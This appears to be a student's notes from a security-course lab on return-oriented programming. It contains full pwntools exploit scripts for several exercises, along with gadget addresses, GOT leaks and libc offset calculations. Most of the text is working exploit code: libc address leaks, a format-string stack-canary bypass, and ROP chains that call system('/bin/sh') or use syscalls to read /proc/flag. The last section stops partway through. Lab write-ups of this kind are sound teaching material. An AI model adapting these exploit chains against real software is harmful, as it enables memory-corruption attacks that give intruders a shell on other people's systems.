q1 basic-rop0x8048648 <start+35>: lea eax,[ebp-0x3a]buffer start: EAX:

1. q1 basic-rop
2.  
3. 0x8048648 <start+35>: lea eax,[ebp-0x3a]
4. buffer start: EAX: 0xff913d3e --> 0xfffff769
5.  
6. return: x/wx $ebp+4
7. 0xff913d7c: 0x08048688
8.  
9. using cyclic to find the return address so cyclic(62)
10.  
11. using 0x8048450 (<puts@plt>: to leak the libc addr
12.  
13. when we are looking at the got table: i see
14. 0x0804a000 0x0804b000 rw-p /home/seclab/lab07/rop-basic/t
15. and I find this:
16. 0x804a00c <fgets@got.plt>: 0xf75deca0 (arg)
17.  
18. print system get: 0xf760e310 <system>
19. and bin/sh at 0xf7730cec ("/bin/sh")
20.  
21. so arg - 145808 = system
22. arg + 1044556 = "/bin/sh"
23.  
24. overwrite return addr with:
25. 0x8048450 (print)
26. 0x08048625 (start)
27. 0x804a00c(arg)
28.  
29.  
30. #!/usr/bin/env python2
31.  
32. import struct
33. import subprocess as sp
34. from pwn import *
35. from binascii import hexlify
36.  
37. context.update(arch='i386', os='linux')
38. context.terminal = ['tmux', 'splitw', '-h']
39.  
40.  
41. def run():
42. payload = cyclic(62) + pack(0x8048450) + pack(0x08048625)+pack(0x804a00c)
43. p = gdb.debug("./t", '''d
44. b *start+38
45. continue
46. ''')
47. #shell = "/bin/sh;"+ "%33816d%2391$hn"
48. #p.recvline()
49. p.recvline()
50. p.sendline(payload)
51. a = int("0x"+hexlify(p.recv(4)[::-1]),16)
52. #print("addr " + a)
53. system = a - 145808
54. _bin = a + 1044556
55. payload2 = cyclic(62) + pack(system) + pack(_bin) + pack(_bin)
56. p.sendline(payload2)
57. #p.sendline()
58. #p.sendline("cat /proc/flag")
59. #print(p.recvall(2))
60. p.interactive()
61. #p.close()
62.  
63.  
64.  
65. #for i in range(5000):
66. run()
67.  
68.  
69.  
70.  
71.  
72.  
73. rop-64
74. Call open_flag(), read_flag(), show_flag() with appropriate arguments.
75.  
76. use cyclic to find the ret addr in start
77. 0x0000000000400713: pop rdi; ret;
78. ags: -559038737
79. open_flag: 0x00000000004005bd
80.  
81.  
82. //read_flag taks 2 args: arg1: 0x1234567 arg2: 0x89ABCDEF
83. //read_flag starts at 0x0000000000400603
84. //check calling convension: arg1 RDI, arg2: RSI
85. //gadge:0x0000000000400713: pop rdi; ret;
86. //gadge: 0x0000000000400711: pop rsi; pop r15; ret;
87.  
88. 0x0000000000400713
89. 0x1234567
90. 0x0000000000400711
91. 0x89ABCDEF
92. 0xdeadbeef
93. 0x0000000000400603
94.  
95.  
96.  
97. //show_flag starts at 0x0000000000400652
98. //show_flag taks no args
99. 0x0000000000400652
100.  
101.  
102.  
103. #!/usr/bin/env python2
104. #a = int("0x"+hexlify(p.recv(4)[::-1]),16) reading print out addr
105. import struct
106. import subprocess as sp
107. from pwn import *
108. from binascii import hexlify
109.  
110. context.update(arch='i386', os='linux')
111. context.terminal = ['tmux', 'splitw', '-h']
112.  
113.  
114. def run():
115. read_flag = p64(0x0000000000400713) + p64(0x1234567) + p64(0x0000000000400711) + p64(0x89ABCDEF) + \
116. p64(0xdeadbeef) + p64(0x0000000000400603)
117. show_flag = p64(0x0000000000400652)
118. payload = cyclic(40) + p64(0x0000000000400713) + p64(0xdeadbeef)+ p64(0x00000000004005bd) + \
119. read_flag + show_flag
120. p = gdb.debug("./t", '''d
121. b *start+41
122. continue
123. ''')
124. #shell = "/bin/sh;"+ "%33816d%2391$hn"
125. #p.recvline()
126. #p.recvline()
127. p.sendline(payload)
128. p.interactive()
129. #p.close()
130.  
131.  
132.  
133. #for i in range(5000):
134. run()
135.  
136.  
137.  
138.  
139. pop##################################
140. //first we use cyclic to find the return addr which is cyclic(256)
141. //0x08048093: popal; ret;
142. 0x08048087: int 0x80; ret;
143. 0x80490e8 is data segment
144.  
145. first we want to open the /proc/flag file
146. we want to have something looks like this for open
147. pop
148. ret
149. eax 5
150. ebx /proc/flag
151. ecx 0
152. edx 0
153. esp
154. ebp
155. esi
156. edi
157.  
158. so we need to read "/proc/flag" to r/x segment first
159.  
160. pop 0x08048093
161. edi
162. esi
163. ebp
164. esp cyclic(16)
165. ebx 0
166. edx 10
167. ecx 0x80490e8
168. eax 3
169. 0x80 0x08048087
170.  
171. and then we can open the file
172. pop 0x08048093
173. edi
174. esi
175. ebp
176. esp cyclic(16)
177. ebx 0x80490e8
178. edx 0
179. ecx 0
180. eax 5
181. 0x80 0x08048087
182.  
183. and then we are going to read the buffer
184. pop 0x08048093
185. edi
186. esi
187. ebp
188. esp cyclic(16)
189. ebx 0x3
190. edx 500
191. ecx 0x80490e8
192. eax 3
193. 0x80 0x08048087
194.  
195. last we are going to print out the file
196. pop 0x08048093
197. edi
198. esi
199. ebp
200. esp cyclic(16)
201. ebx 0x1
202. edx 500
203. ecx buff
204. eax 4
205. 0x80 0x08048087
206.  
207.  
208. #!/usr/bin/env python2
209. #a = int("0x"+hexlify(p.recv(4)[::-1]),16) reading print out addr
210. import struct
211. import subprocess as sp
212. from pwn import *
213. from binascii import hexlify
214.  
215. context.update(arch='i386', os='linux')
216. context.terminal = ['tmux', 'splitw', '-h']
217.  
218.  
219. def run():
220. h80 = 0x08048087
221. pop = 0x08048093
222. buff = 0x8049110
223. bufsize = 2000
224. read_filename = cyclic(256) + pack(0x08048093) + cyclic(16) + pack(0) + pack(10) + pack(buff) + pack(3) + pack(0x08048087)
225. open_file = pack(0x08048093) +cyclic(16) + pack(buff) + pack(0)*2 + pack(5) + pack(h80)
226. read_flie = pack(pop) + cyclic(16) + pack(0x3) + pack(2000) + pack(buff) + pack(3) + pack(h80)
227. write_file = pack(pop) + cyclic(16) + pack(1) + pack(2000) + pack(buff) + pack(4) + pack(h80)
228. payload = read_filename + open_file + read_flie + write_file
229. p = gdb.debug("./t", '''d
230. b *0x080480e6
231. continue
232. ''')
233. #p.recvall(1)
234. #sleep(1)
235. p.sendline(payload)
236. #p.recvline()
237. #p.sendline("/proc/flag\0")
238. p.interactive()
239. #p.close()
240.  
241.  
242.  
243. run()
244.  
245.  
246.  
247.  
248. sprintf###################################
249.  
250. we first print out the cannary value
251. cannary was store in $rbp-0x8 which is 0x7fff150cbd88
252. $rsp is 0x7fff150cba80
253.  
254. (canary - $rsp)/8 = 97
255. so we first print payload = "%97$lx %98$lx %99$lx %100$lx %101$lx %102$lx"
256. and the cannary is store in %102$lx
257.  
258. buffer starts at 0x7fff39f44370
259. canary 0x7fff39f44578
260. ret is at 0x7fff39f44588
261.  
262. buffer - canary = 520
263. ret - canary = 16
264.  
265. then we use %520d to overwrite the canary value. but since canary ends at 00 so I first overwrite cannary as cannary +5 and then overwrite the last byte as 00
266.  
267. Next we need to find the system value
268. we first do a vmmap and find that
269. 0x00400000 0x00401000 r-xp /home/seclab/lab07/sprintf/
270. │0x00600000 0x00601000 r--p /home/seclab/lab07/sprintf/
271. │0x00601000 0x00602000 rw-p /home/seclab/lab07/sprintf/target
272.  
273.  
274. x/20g 0x00601000
275. │0x601000: 0x0000000000600e28 0x00007ff00afca1c8
276. │0x601010: 0x00007ff00adbc670 0x0000000000400646
277. │0x601020 <__stack_chk_fail@got.plt>: 0x0000000000400656 0x0000000000400666
278. │0x601030 <printf@got.plt>: 0x0000000000400676 0x0000000000400686
279. │0x601040 <read@got.plt>: 0x0000000000400696 0x00007ff00a9fee50
280. │0x601050 <__gmon_start__@got.plt>: 0x00000000004006b6 0x00007ff00aa4d5a0
281. │0x601060 <sprintf@got.plt>: 0x00000000004006d6 0x0000000000000000
282. │0x601070: 0x0000000000000000 0x0000000000000000
283. │0x601080 <stdout@@GLIBC_2.2.5>: 0x00007ff00ada0400 0x00007ff00ada0640
284. │vx601090 <completed.6973>: 0x0000000000000000 0x0000000000000000
285.  
286. and luckily we see 0x00007ff00a9fee50 which is within libc
287. 0x601048 <__libc_start_main@got.plt>: 0x00007fb3188fde50
288. $9 = (<text variable, no debug info> *) 0x7fb318922590 <__libc_system>
289. libc : 0x7fb318a5c503 --> 0x68732f6e69622f ('/bin/sh')
290.  
291. 0x00007fb3188fde50 + 149312 = system
292. + 1435315 = bin/sh
293.  
294.  
295. so we first use overwrite return addr with puts
296. call 0x400640 <puts@plt>
297. and then overwrite the canary
298.  
299. and we need to save the value in edi
300. so we use pop rdi: 0x0000000000400973
301.  
302. pop rdi 0x0000000000400973
303. reg 0x601048
304. print 0x400640
305.  
306. so the whole payload will look like
307. canary xxxx xxxx pop reg print
308.  
309. but because the string stops at 00 so we need to overwrite the 00 bit one by one
310.  
311. p.recvline(1)
312. p.recvline(1)
313. p.sendline(payload1)
314. canary = "0x" + p.recvline().split(" ")[-1][:-1]
315. print(canary)
316. canary = int(canary,16)
317.  
318. overwrite0(555, 560, p)
319. payload = "%552d" + p64(0x400640)
320. p.sendline(payload)
321.  
322. overwrite0(547, 552,p)
323. sleep(0.2)
324. payload = "%544d" + p64(0x601048)
325. p.sendline(payload)
326.  
327. overwrite0(539, 544, p)
328. sleep(0.2)
329. payload = "%536d" + p64(0x400973)
330. p.sendline(payload)
331.  
332. sleep(0.2)
333. payload = "%520d"+ p64(canary+5)
334. p.sendline(payload)
335. overwrite0(520, 521,p)
336.  
337.  
338. sleep(1)
339. p.sendline("n")
340.  
341.  
342.  
343.  
344. next we get the reg value and calculate system and binsh
345. addr = hexlify(p.recv(6)[::-1])
346. addr = int("0x"+ addr,16)
347.  
348. system = pack(addr + 149312)
349. binsh = pack(addr + 1435315)
350.  
351. start: 0x00000000004007cd
352. pop rdi 0x0000000000400973
353. binsh
354. system
355.  
356.  
357.  
358. #!/usr/bin/env python2
359. #a = int("0x"+hexlify(p.recv(4)[::-1]),16) reading print out addr
360. import struct
361. import subprocess as sp
362. from pwn import *
363. from binascii import hexlify
364.  
365. context.update(arch='i386', os='linux')
366. context.terminal = ['tmux', 'splitw', '-h']
367.  
368.  
369. def run():
370. payload1 = "%102$lx"
371. p = gdb.debug("./t", '''d
372. b *0x0000000000400864
373. b *0x00000000004008b2
374. continue
375. ''')
376. #p.recvline(1)
377. p.recvline(1)
378. p.sendline(payload1)
379. canary = "0x" + p.recvline().split(" ")[-1][:-1]
380. print(canary)
381. canary = int(canary,16)
382.  
383. payload = "%560d" + p64(0x4007cd)
384. p.sendline(payload)
385.  
386. overwrite0(555, 560, p)
387. sleep(0.2)
388. payload = "%552d" + p64(0x400640)
389. p.sendline(payload)
390.  
391. overwrite0(547, 552,p)
392. sleep(0.2)
393. payload = "%544d" + p64(0x601048)
394. p.sendline(payload)
395.  
396. overwrite0(539, 544, p)
397. sleep(0.2)
398. payload = "%536d" + p64(0x400973)
399. p.sendline(payload)
400.  
401. sleep(0.2)
402. payload = "%520d"+ p64(canary+5)
403. p.sendline(payload)
404. overwrite0(520, 521,p)
405.  
406.  
407. sleep(1)
408. p.sendline("n")
409.  
410. sleep(0.2)
411. p.recvuntil("'n'")
412. sleep(0.2)
413. print("### " + p.recvline())
414. addr = hexlify(p.recv(6)[::-1])
415. addr = int("0x"+ addr,16)
416.  
417. system = p64(addr + 149312)
418. binsh = p64(addr + 1435315)
419.  
420. payload1 = "%102$lx"
421. print("##### " + p.recvline(1))
422. print("##### " + p.recvline(1))
423. p.sendline(payload1)
424. canary = "0x" + p.recvline().split(" ")[-1][:-1]
425. print(canary)
426. canary = int(canary,16)
427.  
428. #overwrite0(555, 560, p)
429. sleep(0.2)
430. payload = "%552d" + system
431. p.sendline(payload)
432.  
433. overwrite0(550, 552,p)
434. sleep(0.2)
435. payload = "%544d" + binsh
436. p.sendline(payload)
437.  
438. overwrite0(539, 544, p)
439. sleep(0.2)
440. payload = "%536d" + p64(0x400973)
441. p.sendline(payload)
442.  
443. sleep(0.2)
444. payload = "%520d"+ p64(canary+5)
445. p.sendline(payload)
446. overwrite0(520, 521,p)
447. sleep(1)
448. p.sendline("n")
449.  
450.  
451.  
452.  
453.  
454.  
455. #p.sendline("/proc/flag\0")
456. p.interactive()
457. #p.close()
458.  
459. def overwrite0(start, end, p):
460. end = end - 1
461. while(start <= end):
462. payload = "%{}d".format(end) + chr(0)
463. sleep(0.2)
464. p.send(payload)
465. end = end - 1
466.  
467.  
468.  
469. run()
470.  
471.  
472. # 0x00007fb0e9b25e50
473.  
474.  
475.  
476.  
477.  
478. puzzle######################################################
479. ROP_ATTACK_SUCCESS\0
480. first we use cyclic to find the return addr and then overwrite it with strcpy
481. and then the gadge is 0x0804889e: pop edi; pop ebp; ret;
482.  
483. strcpy 0x8048540
484. pop 0x0804889e
485. buf 0x80488d0
486. R 0x80488ed
487. strcpy
488. pop
489. buf + 1
490. O 0x80488ea
491. P
492.  
493. pop buf+3
494. _ 0x80488f6
495. A
496. T
497. T
498. A
499. C
500. K
501. _
502. S
503. U
504. C
505. C
506. E
507. S
508. S
509.  
510. #!/usr/bin/env python2
511. #a = int("0x"+hexlify(p.recv(4)[::-1]),16) reading print out addr
512. import struct
513. import subprocess as sp
514. from pwn import *
515. from binascii import hexlify
516.  
517. context.update(arch='i386', os='linux')
518. context.terminal = ['tmux', 'splitw', '-h']
519.  
520.  
521.  
522.  
523. pop = pack(0x0804889e)
524. strcpy = pack(0x8048540)
525. a = 0x80488dc
526. buf = 0x804a030
527. put = pack(0x8048550)
528.  
529. def run():
530. payload = cyclic(44)
531. for i in "ROP_ATTACK_SUCCESS*":
532. payload = payload + pbc(i)
533. payload = payload + put + cyclic(4) + pack(0x804a030)
534. #p = gdb.debug(["./v", payload], '''d
535. # b main
536. # continue
537. # ''')
538.  
539. p = gdb.debug("./t", '''d
540. continue
541. ''')
542. p.sendline(payload)
543. p.interactive()
544. #p.close()
545.  
546. def pbc(c):
547. global pop
548. global strcpy
549. global a
550. global buf
551. b = strcpy + pop + pack(buf)
552. if c == '_':
553. b = b + pack(0x80488f6)
554. elif c == '*':
555. b = b + pack(0x80488f7)
556. else:
557. b = b + pack(a + ord(c) - ord('A'))
558. buf = buf + 1
559. return b
560.  
561. if __name__ == "__main__":
562. run()
563.  
564.  
565. # 0x00007fb0e9b25e50
566.  
567.  
568.  
569.  
570. uptoret##############################
571. first we overwrite the return address to leave which will change how the esp points at. and the we overwrite the ebp with gbuf so that what's inside points to start
572.  
573. and then we find a gadge
574. 0x080486cd: pop esi; pop edi; pop ebp; ret;
575.  
576. and we look at the got table we find that
577. 0x804a024 <setvbuf@got.plt>: 0xf7646ec0
578.  
579.  
580. 0xf7621310 <system>
581. 0xf7743cec ("/bin/sh")
582.  
583. got - 154544 = system
584. got + 1035820 = bin/sh
585.  
586. this two gadges helps adjust the stack pointer
587. 0x080486cf: pop ebp; ret;
588. 0x080484c8: leave; ret;
589.  
590. #!/usr/bin/env python2
591. #a = int("0x"+hexlify(p.recv(4)[::-1]),16) reading print out addr
592. import struct
593. import subprocess as sp
594. from pwn import *
595. from binascii import hexlify
596.  
597. context.update(arch='i386', os='linux')
598. context.terminal = ['tmux', 'splitw', '-h']
599.  
600.  
601.  
602.  
603. def run():
604. write = pack(0x8048430) + pack(0x080486cd) + pack(1) + pack(0x804a024) + pack(4)
605. readsys = pack(0x80483e0) + pack(0x080486cd) + pack(0) + pack(0x804ad80) + pack(0x100)
606. stackpoint = pack(0x080486cf) + pack(0x804ad7c) + pack(0x080484c8)
607.  
608. payload = pack(1) + write + readsys + stackpoint +cyclic(216) + pack(0x804a080) + pack(0x80485fa)
609.  
610. p = gdb.debug("./t", '''d
611. b *0x080485fb
612. continue
613. ''')
614. #print("####1 " + p.recvline(1))
615. p.sendline(payload)
616. print("###2 " + p.recvline(1))
617. a = "0x"+hexlify(p.recv(4)[::-1])
618. print(a)
619. a = int(a, 16)
620. system = pack(a -154544)
621. binsh = pack(a + 1035820)
622. #print("sending ...")
623. sleep(1)
624. p.sendline(system + pack(0x080486cf) + binsh)
625.  
626. p.interactive()
627. #p.close()
628.  
629.  
630.  
631. if __name__ == "__main__":
632. run()
633.  
634.  
635. # 0x00007fb0e9b25e50
636.  
637.  
638.  
639.  
640. find gadge ##########
641. we first find that $rsp+17*8 is a value in libc
642. 0x600fe0 <read@got.plt>: 0x00007f1f65d01320
643.  
644. and then we find the addr of system and bin/sh
645. system: 0x7f1f65c58590
646. binsh: 0x7f1f65d92503
647.  
648. r - 691600 = s
649. r + 594403 = b
650.  
651. and then we are going to overwrite ret with print to print out the got value
652. 0x0000000000400631: pop rsi; pop r15; ret;
653. rsi 0x600fe0
654. cyclic(8)
655. write 0x400450
656.  
657. and the we use it to calculate the system and bin sh value and then we jump back to main and buffer overflow it again
658.  
659.  
660. #!/usr/bin/env python2
661. #a = int("0x"+hexlify(p.recv(4)[::-1]),16) reading print out addr
662. import struct
663. import subprocess as sp
664. from pwn import *
665. from binascii import hexlify
666.  
667. context.update(arch='i386', os='linux')
668. context.terminal = ['tmux', 'splitw', '-h']
669.  
670.  
671.  
672.  
673. def run():
674. write = p64(0x000000000040057d) + p64(0x0000000000400631) + p64(0x600fe0) + p64(0) + p64(0x400450)
675. #read = p64(0x0000000000400633) + p64(0) + p64(0x0000000000400631) + p64(0x601a00)+ p64(0) + p64(0x400460)
676. main = p64(0x40057e)
677. payload =cyclic(107, n=8) + write + main
678. p = gdb.debug("./t", '''d
679. b *0x0000000000400589
680. continue
681. ''')
682. p.sendline(p64(107+6*10))
683. p.sendline(payload)
684. p.recvuntil("aaaa")
685. p.recv(107+6*8-4)
686. sleep(1)
687. reg = p.recv(80)
688. print("### " + hexlify(reg[7:15]) + "###")
689. #print("#### " + p.recv(98+10*8) + "#####")
690. #print("####. " + reg + "####")
691. #p.sendline(p64(170))
692. reg = "0x" + hexlify(reg[7:15][::-1])
693. reg = int(reg, 16)
694. system = reg - 691600
695. binsh = reg + 594403
696. print("system " + hex(system) + " bin " + hex(binsh))
697. #sleep(1)
698. #p.sendline(p64(106+8*5))
699. #sleep(1)
700. payload = cyclic(120, n=8) + p64(system) + p64(0x0000000000400633) + p64(binsh) + p64(system)
701. #print("send line")
702. #p.sendline(p64(170))
703. #p.recvline()
704. #print("### " + p.recvline())
705. p.send(p32(170))
706. p.sendline(payload)
707.  
708. #print("#### " + p.recv(98+8*8) + "#####")
709. #sleep(2)
710. #p.sendline("cat /proc/flag")
711.  
712.  
713.  
714.  
715.  
716. p.interactive()
717. #p.close()
718.  
719.  
720.  
721. if __name__ == "__main__":
722. run()
723.  
724.  
725. # 0x00007fb0e9b25e50
726.  
727.  
728.  
729.  
730. #####rop sorting####
731. the list is store in 0x804a040
732. libc addr is in [0xfff9e11c] 0xf75cfaf3
733. libc : 0xf75c35cf ("qsort")
734.  
735. r - libc = var